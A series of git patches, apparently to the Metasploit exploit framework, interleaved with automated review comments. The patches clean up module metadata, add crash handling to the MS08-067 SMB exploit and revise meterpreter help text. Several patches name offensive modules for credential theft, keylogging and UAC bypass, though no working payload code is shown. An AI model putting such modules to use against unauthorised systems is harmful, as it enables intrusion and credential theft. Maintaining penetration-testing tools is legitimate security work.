'$Revision$', 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index 8fc2b9b5b6..731b59e1cb 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Brendan Coles ', # Discovery and exploit ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 3 $', + 'Version' => '$Revision$', 'Privileged' => false, 'Arch' => ARCH_CMD, 'Platform' => 'unix', 
diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 7e84e55847..053fccccc1 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'Jacob Giannantonio', 'Patrick Hof', 'h0ng10' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 15620 $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0738' ], # by using VERB other than GET/POST diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index 5a07039eb5..e33e0fa926 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote 'mihi' # ARCH_JAVA support ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0391'], diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb index c759aa93b1..236ec13602 100644 --- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb +++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote 'TecR0c ', # Metasploit module 'mr_me ' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'EDB', 15668 ], diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb index 2fbbd82d1b..cd1c6320ed 100644 --- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb 
+++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote 'TecR0c ', # Metasploit module 'mr_me ' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0356' ], diff --git a/modules/exploits/windows/fileformat/csound_getnum_bof.rb b/modules/exploits/windows/fileformat/csound_getnum_bof.rb index ad1551a1ce..11390576f6 100644 --- a/modules/exploits/windows/fileformat/csound_getnum_bof.rb +++ b/modules/exploits/windows/fileformat/csound_getnum_bof.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Secunia', # Vulnerability discovery 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0270' ], diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb index 698771cb47..a698daff98 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_launch.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Francisco Falcon', # Discovery 'bannedit' # Metasploit module ], - 'Version' => '$Revision: 14069 $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE' , '2009-0837' ], diff --git a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb index 7b33f47358..93ac7c5917 100644 --- a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb +++ b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Tiago Henriques', # metasploit module 'James Fitts' # clean ups ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'EDB', 14373 ], 
diff --git a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb index 3de93967df..c3e4fcba29 100644 --- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Jacques Louw', # Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'BID', '49149' ], diff --git a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb index d48d783b55..443b575891 100644 --- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb +++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Diego Juarez', # Vulnerability discovery 'juan vazquez', # Metasploit module ], - 'Version' => '$ $', 'References' => [ [ 'BID', '28541' ], diff --git a/modules/exploits/windows/fileformat/vlc_realtext.rb b/modules/exploits/windows/fileformat/vlc_realtext.rb index 79f2e33021..7cec8a7364 100644 --- a/modules/exploits/windows/fileformat/vlc_realtext.rb +++ b/modules/exploits/windows/fileformat/vlc_realtext.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote 'SkD', # Exploit 'juan vazquez' # Metasploit Module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '49809' ], diff --git a/modules/exploits/windows/http/bea_weblogic_post_bof.rb b/modules/exploits/windows/http/bea_weblogic_post_bof.rb index 128c522cb0..5c9eafb89f 100644 --- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb +++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb 
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote 'KingCope', # Vulnerability Discovery and PoC 'juan vazquez', # Metasploit Module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3257' ], diff --git a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb index 3f9a422f48..31261e648b 100644 --- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb +++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Andrea Micalizzi', # aka rgod - Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'Platform' => 'win', 'References' => [ diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb index 60a80569ee..9265d98094 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote 'AbdulAziz Hariri', # Initial discovery via ZDI 'alino <26alino[at]gmail.com>' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb index 12ee128f78..2dc4ce226a 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb 
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote 'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb index 004e550e1e..33f13c20a2 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote 'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb index ed92d421d6..bb92d02b25 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'alino <26alino[at]gmail.com>', # citrix_streamprocess_data_msg author 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ ['OSVDB', '75780'], diff --git a/modules/exploits/windows/misc/gimp_script_fu.rb b/modules/exploits/windows/misc/gimp_script_fu.rb index 6fb3a43ed0..8e96415b39 100644 --- a/modules/exploits/windows/misc/gimp_script_fu.rb +++ b/modules/exploits/windows/misc/gimp_script_fu.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Joseph Sheridan', # Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-2763' ], 
diff --git a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb index fea85b7d75..6d97fb05b5 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote 'juan vazquez', 'sinn3r' ], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0124' ], diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index b1d654989c..f80cbb92d3 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'todb '], - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'Platform' => [ 'linux','unix','osx','solaris','aix' ], 'References' => [ diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb index 1caebb1051..6c27b0d04e 100644 --- a/modules/post/windows/gather/credentials/imvu.rb +++ b/modules/post/windows/gather/credentials/imvu.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Post 'Shubham Dawra ' # www.SecurityXploded.com ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 14100 $', + 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index a236496258..748f511119 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Justin Cacak'], - 'Version' => '$Revision: 14835 $', + 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) 
From 6147b332f1e5c3269dccb71df5cbcf7759a8ed27 Mon Sep 17 00:00:00 2001
From: James Lee
Date: Mon, 22 Oct 2012 14:15:58 -0500
Subject: [PATCH 26/74] Rescue when the service is crashed
Failed exploit attempts leave the service in a state where the port is still open but login attmempts reset the connection. Rescue that and give the user an indication of what's going on.
---
.../exploits/windows/smb/ms08_067_netapi.rb | 22 +++++++++++++++++--
1 file changed, 20 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb
index 8d50d9bf4a..e60da6e5a3 100644
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -807,8 +807,18 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
- connect()
- smb_login()
+ begin
+ connect()
+ smb_login()
+ rescue Rex::Proto::SMB::Exceptions::LoginError => e
+ if (e.message =~ /Connection reset/)
+ print_error("Connection reset during login")
+ print_error("This most likely means a previous exploit attempt caused the service to crash")
+ return
+ else
+ raise e
+ end
+ end
# Use a copy of the target
mytarget = target
@@ -1052,6 +1062,14 @@ class Metasploit3 < Msf::Exploit::Remote
rescue Rex::ConnectionError => e
print_error("Connection failed: #{e.class}: #{e}")
return
+ rescue Rex::Proto::SMB::Exceptions::LoginError => e
+ if (e.message =~ /Connection reset/)
+ print_error("Connection reset during login")
+ print_error("This most likely means a previous exploit attempt caused the service to crash")
+ return Msf::Exploit::CheckCode::Unknown
+ else
+ raise e
+ end
end
#
From eb76c46ddd4bf5a07a8c7a5374045958ec068a48 Mon Sep 17 00:00:00 2001
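Review bot: The rescue clause added to `exploit` is repeated verbatim in the second hunk (`@@ -1052,6 +1062,14 @@`, inside `check`), differing only in what is returned, so the message test and the two `print_error` calls belong in one private helper that both clauses consult; in `check` the clause then reduces to `raise unless login_reset?(e)` followed by `return Msf::Exploit::CheckCode::Unknown`. Matching `e.message =~ /Connection reset/` is a comparison against text composed by the SMB layer, so if `Rex::Proto::SMB::Exceptions::LoginError` carries a structured cause that would be the more robust thing to test; otherwise a one-line comment naming the exact message expected will spare the next maintainer a search. Style: inside a `rescue`, bare `raise` re-raises the current exception and is the idiom over `raise e`, and the parentheses around the `if` condition are unnecessary. The body of `exploit` continues past the first hunk and `check` begins before the second.
```ruby
  # Shared by exploit and check: true when +e+ is the "Connection reset"
  # LoginError that a service crashed by an earlier attempt produces; the
  # explanation is printed here so both callers report it identically.
  def login_reset?(e)
    return false unless e.message =~ /Connection reset/
    print_error("Connection reset during login")
    print_error("This most likely means a previous exploit attempt caused the service to crash")
    true
  end

  def exploit
    begin
      connect()
      smb_login()
    rescue Rex::Proto::SMB::Exceptions::LoginError => e
      raise unless login_reset?(e)
      return
    end
    # … unchanged: target selection and the rest of exploit …
```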
From: Michael Schierl Date: Mon, 22 Oct 2012 21:24:36 +0200 Subject: [PATCH 27/74] Infohash key cleanups Replace obvious typos in infohash keys. Note that this *does* affect the behaviour as those keys have been ignored before. --- modules/exploits/linux/local/udev_netlink.rb | 2 +- modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/local/udev_netlink.rb b/modules/exploits/linux/local/udev_netlink.rb index 91f560d713..c9fcd64d47 100644 --- a/modules/exploits/linux/local/udev_netlink.rb +++ b/modules/exploits/linux/local/udev_netlink.rb @@ -60,7 +60,7 @@ class Metasploit4 < Msf::Exploit::Local [ 'Linux x64', { 'Arch' => ARCH_X86_64 } ], #[ 'Command payload', { 'Arch' => ARCH_CMD } ], ], - 'DefaultOptons' => { 'WfsDelay' => 2 }, + 'DefaultOptions' => { 'WfsDelay' => 2 }, 'DefaultTarget' => 0, 'DisclosureDate' => "Apr 16 2009", } diff --git a/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb b/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb index fbea3a7691..f9c5a4b47f 100644 --- a/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb @@ -43,7 +43,7 @@ class Metasploit4 < Msf::Exploit::Remote { 'BadChars' => "\x00\x3a\x3b\x3d\x3c\x3e\x0a\x0d\x22\x26\x27\x2f\x60\xb4", }, - 'Platforms' => [ 'win' ], + 'Platform' => [ 'win' ], 'Targets' => [ [ From 601ecec2cf73e948204f212be14ac15e232301ca Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 22 Oct 2012 15:16:55 -0500 Subject: [PATCH 28/74] Use opts.usage instead of a Table --- .../console/command_dispatcher/stdapi/sys.rb | 28 +++++-------------- 1 file changed, 7 insertions(+), 21 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 5e09ef8cd5..485c2c4b9b 100644 
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -43,14 +43,14 @@ class Console::CommandDispatcher::Stdapi::Sys
"-t" => [ true, "The registry value type (E.g. REG_SZ)." ],
"-v" => [ true, "The registry value name (E.g. Stuff)." ],
"-r" => [ true, "The remote machine name to connect to (with current process credentials" ],
- "-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ])
+ "-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ])
@@ps_opts = Rex::Parser::Arguments.new(
- "-h" => [false, "Help menu."],
- "-S" => [true, "RegEx term to filter on process name with "],
- "-A" => [true, "Arch to filter on (x86 or x86_64"],
- "-s" =>[false, "Show only SYSTEM processes"],
- "-U" => [true, "RegEx term to filter on user name with"])
+ "-h" => [ false, "Help menu." ],
+ "-S" => [ true, "Filters processes on the process name using the supplied RegEx"],
+ "-A" => [ true, "Filters processes on architecture (x86 or x86_64)" ],
+ "-s" => [ false, "Show only SYSTEM processes" ],
+ "-U" => [ true, "Filters processes on the user using the supplied RegEx" ])
#
# List of supported commands.
@@ -343,21 +343,7 @@ class Console::CommandDispatcher::Stdapi::Sys
print_line "Use the command with no arguments to see all running processes."
print_line "The following options can be used to filter those results:"
- tbl = Rex::Ui::Text::Table.new(
- 'Header' => "Options List",
- 'Indent' => 1,
- 'Columns' =>
- [
- "Option",
- "Details"
- ]
- )
-
- tbl << ["-s", "Display only SYSTEM processes"]
- tbl << ["-S ", "Filters processes on the process name using the supplied RegEx"]
- tbl << ["-A ", "Filters processes on the arch. (x86, x86_64)"]
- tbl << ["-U ", "Filters processes on the user using the supplied RegEx"]
- print_line tbl.to_s
+ print_line @@ps_opts.usage
end
From f1829b40e1f7a7620acb1b6206087fd54a6f7806 Mon Sep 17 00:00:00 2001
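Review bot: In the first hunk the `-w` entry of the registry option table is rewritten with no visible textual change, so presumably only whitespace moved, but while it is being touched note that it is declared with `false` — by the convention the other entries follow, an option that takes no argument — although its help text says `valid values [32|64]`; if the usage text is going to be the user-facing documentation, the consumer of `-w` should be checked and the entry changed to `"-w" => [ true, "Set KEY_WOW64 flag, valid values [32|64]." ]` or the text corrected. The new `-S` line, `"-S" => [ true, "Filters processes on the process name using the supplied RegEx"],`, lacks the space before `]` that its four neighbours have. In the second hunk, `print_line @@ps_opts.usage` replaces a table that had its own header, so the two `print_line` sentences before it now run straight into the option list; an empty `print_line` between them keeps the help readable, and the usage text now also lists `-h`, which the old table omitted. The method enclosing the second hunk starts outside it.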
From: Michael Schierl Date: Mon, 22 Oct 2012 22:34:47 +0200 Subject: [PATCH 29/74] References cleanup Uppercase MSB, spaces in URLs. --- modules/exploits/windows/fileformat/ms12_005.rb | 2 +- modules/exploits/windows/iis/ms02_065_msadc.rb | 2 +- modules/exploits/windows/iis/msadc.rb | 4 ++-- modules/exploits/windows/local/bypassuac.rb | 2 +- modules/post/windows/escalate/bypassuac.rb | 2 +- 5 files changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/fileformat/ms12_005.rb b/modules/exploits/windows/fileformat/ms12_005.rb index 6364632d08..4cbfa12ec1 100644 --- a/modules/exploits/windows/fileformat/ms12_005.rb +++ b/modules/exploits/windows/fileformat/ms12_005.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote [ ['CVE', '2012-0013'], ['OSVDB', '78207'], - ['MSB', 'ms12-005'], + ['MSB', 'MS12-005'], ['BID', '51284'], ['URL', 'http://support.microsoft.com/default.aspx?scid=kb;EN-US;2584146'], ['URL', 'http://exploitshop.wordpress.com/2012/01/14/ms12-005-embedded-object-package-allow-arbitrary-code-execution/'] diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index 435fd68ec0..ce315ae0a8 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote ['OSVDB', '14502'], ['BID', '6214'], ['CVE', '2002-1142'], - ['MSB', 'ms02-065'], + ['MSB', 'MS02-065'], ['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html'] ], 'Privileged' => false, diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index 4cdb4be539..5f5c6ab8c1 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb 
@@ -42,8 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote ['OSVDB', '272'], ['BID', '529'], ['CVE', '1999-1011'], - ['MSB', 'ms98-004'], - ['MSB', 'ms99-025'] + ['MSB', 'MS98-004'], + ['MSB', 'MS99-025'] ], 'Targets' => [ diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index 3788b2c7ee..983600d305 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Local 'Targets' => [ [ 'Windows', {} ] ], 'DefaultTarget' => 0, 'References' => [ - [ 'URL', ' http://www.trustedsec.com/december-2010/bypass-windows-uac/' ] + [ 'URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/' ] ], 'DisclosureDate'=> "Dec 31 2010" )) diff --git a/modules/post/windows/escalate/bypassuac.rb b/modules/post/windows/escalate/bypassuac.rb index 06ef199e58..9c88439bc4 100644 --- a/modules/post/windows/escalate/bypassuac.rb +++ b/modules/post/windows/escalate/bypassuac.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Post 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => [ - [ 'URL', ' http://www.trustedsec.com/december-2010/bypass-windows-uac/' ] + [ 'URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/' ] ], 'DisclosureDate'=> "Dec 31 2010" )) From e675f4e901ce1b2d06bdd4d68c902b602b7c3ef7 Mon Sep 17 00:00:00 2001 
From: Rob Fuller Date: Mon, 22 Oct 2012 17:01:58 -0400 Subject: [PATCH 30/74] standardizing author info --- lib/msf/core/module/author.rb | 3 ++- modules/auxiliary/scanner/http/enum_wayback.rb | 2 +- modules/auxiliary/scanner/http/httpbl_lookup.rb | 2 +- modules/exploits/windows/local/ask.rb | 4 +--- modules/exploits/windows/local/bypassuac.rb | 2 +- modules/post/windows/capture/lockout_keylogger.rb | 2 +- modules/post/windows/escalate/droplnk.rb | 2 +- modules/post/windows/gather/cachedump.rb | 5 ++++- modules/post/windows/gather/credentials/gpp.rb | 2 +- modules/post/windows/gather/credentials/mremote.rb | 2 +- modules/post/windows/gather/credentials/vnc.rb | 6 ++++-- modules/post/windows/gather/enum_domains.rb | 2 +- modules/post/windows/gather/enum_proxy.rb | 2 +- modules/post/windows/gather/enum_termserv.rb | 2 +- modules/post/windows/gather/reverse_lookup.rb | 2 +- modules/post/windows/gather/tcpnetstat.rb | 2 +- modules/post/windows/manage/clone_proxy_settings.rb | 2 +- modules/post/windows/recon/computer_browser_discovery.rb | 2 +- modules/post/windows/recon/resolve_hostname.rb | 2 +- modules/post/windows/recon/resolve_ip.rb | 2 +- 20 files changed, 27 insertions(+), 23 deletions(-) diff --git a/lib/msf/core/module/author.rb b/lib/msf/core/module/author.rb index 9cf4a0ef52..81ade99a2e 100644 --- a/lib/msf/core/module/author.rb +++ b/lib/msf/core/module/author.rb @@ -43,7 +43,8 @@ class Msf::Module::Author 'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com', 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com', 'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com', - 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com' + 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com', + 'mubix' => 'mubix' + 0x40.chr + 'hak5.org' } # diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index e3725f4616..15f821499e 100644 
--- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary This module pulls and parses the URLs stored by Archive.org for the purpose of replaying during a web assessment. Finding unlinked and old pages. }, - 'Author' => [ 'Rob Fuller ' ], + 'Author' => [ 'mubix' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' )) diff --git a/modules/auxiliary/scanner/http/httpbl_lookup.rb b/modules/auxiliary/scanner/http/httpbl_lookup.rb index b4b0f7b74f..ebb13a1247 100644 --- a/modules/auxiliary/scanner/http/httpbl_lookup.rb +++ b/modules/auxiliary/scanner/http/httpbl_lookup.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary This module can be used to enumerate information about an IP addresses from Project HoneyPot's HTTP Block List. }, - 'Author' => [ 'Rob Fuller ' ], + 'Author' => [ 'mubix' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 95009ac41d..88a8657f6b 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -27,9 +27,7 @@ class Metasploit3 < Msf::Exploit::Local UAC settings. }, 'License' => MSF_LICENSE, - 'Author' => [ - 'mubix ' # Port to local exploit - ], + 'Author' => [ 'mubix' ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index 983600d305..e297048830 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Local 'Author' => [ 'David Kennedy "ReL1K" ', 'mitnick', - 'mubix ' # Port to local exploit + 'mubix' # Port to local exploit ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 
diff --git a/modules/post/windows/capture/lockout_keylogger.rb b/modules/post/windows/capture/lockout_keylogger.rb index b9157b7034..c3e267b4f2 100644 --- a/modules/post/windows/capture/lockout_keylogger.rb +++ b/modules/post/windows/capture/lockout_keylogger.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Post Winlogon.exe. Using idle time and natural system changes to give a false sense of security to the user.}, 'License' => MSF_LICENSE, - 'Author' => ['Rob Fuller ', 'cg'], + 'Author' => [ 'mubix', 'cg' ], 'Version' => '$Revision$', 'Platform' => ['windows'], 'SessionTypes' => ['meterpreter'], diff --git a/modules/post/windows/escalate/droplnk.rb b/modules/post/windows/escalate/droplnk.rb index d2f0231d8e..952a279f30 100644 --- a/modules/post/windows/escalate/droplnk.rb +++ b/modules/post/windows/escalate/droplnk.rb @@ -19,7 +19,7 @@ class Metasploit3 < Msf::Post connections to be initiated from any user that views the shortcut. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Rob Fuller '], + 'Author' => [ 'mubix' ], 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index 3d84215cd6..f11137f1cf 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -27,7 +27,10 @@ class Metasploit3 < Msf::Post cached as a result of a GPO setting. The default setting on Windows is to store the last ten successful logins.}, 'License' => MSF_LICENSE, - 'Author' => ['Maurizio Agazzini ','Rob Fuller '], + 'Author' => [ + 'Maurizio Agazzini ', + 'mubix' + ], 'Version' => '$Revision$', 'Platform' => ['windows'], 'SessionTypes' => ['meterpreter'], diff --git a/modules/post/windows/gather/credentials/gpp.rb b/modules/post/windows/gather/credentials/gpp.rb index 4e337910a2..83d614a062 100644 --- a/modules/post/windows/gather/credentials/gpp.rb +++ b/modules/post/windows/gather/credentials/gpp.rb 
